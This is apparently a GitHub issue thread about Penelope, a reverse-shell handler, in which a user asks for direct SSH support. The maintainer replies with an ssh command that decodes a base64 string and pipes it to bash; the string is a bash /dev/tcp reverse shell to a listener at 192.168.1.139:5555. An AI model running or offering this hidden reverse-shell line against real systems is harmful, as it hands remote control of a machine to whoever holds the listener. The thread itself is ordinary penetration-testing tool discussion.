penelope icon indicating copy to clipboard operation
penelope copied to clipboard
verified publisher icon brightio

Feature Suggestion: Direct SSH Support

Open bamuwe opened this issue 8 months ago • 1 comments

Penelope currently supports reverse shells really well, and the upload/download features are super useful. However, to use Penelope as a kind of SSH session manager, I currently have to:

First SSH into a machine → Then establish a reverse shell back to my attack box

It would be amazing if Penelope could directly SSH into a target host, just like pwncat or even Paramiko-based session managers. This would allow for seamless session management via SSH without requiring a reverse shell as a prerequisite.

Thanks again for this brilliant tool. Looking forward to future updates — and would be happy to help test new features if needed!

Best regards

bamuwe avatar Apr 18 '25 14:04 bamuwe

Hi @bamuwe, thank you very much for your kind words! Could you please tell me how you would like this feature to run exactly? For the moment you can run penelope -a, copy the bash tcp payload and do something like this:

ssh <ssh_server> "printf KGJhc2ggPiYgL2Rldi90Y3AvMTkyLjE2OC4xLjEzOS81NTU1IDA+JjEpICY=|base64 -d|bash"

and you get a shell. I think this is the easiest way because it leaves everything to the ssh binary. It takes care of all the non-standard ssh server configurations. If you have any better idea I am happy to hear!

brightio avatar Jun 01 '25 22:06 brightio

Hey, that's a great idea! I actually never thought about using the original ssh before — but you're right, it's simpler and more robust. Maybe we could add this suggestion to the README so more people are aware of it. 😄 Thanks again!

bamuwe avatar Jun 04 '25 07:06 bamuwe

Hi @bamuwe, I added a new feature on commit 1a1f330. Please check the changes on the README of how to use it. I am waiting for feedback. Thanks again!

brightio avatar Jul 07 '25 16:07 brightio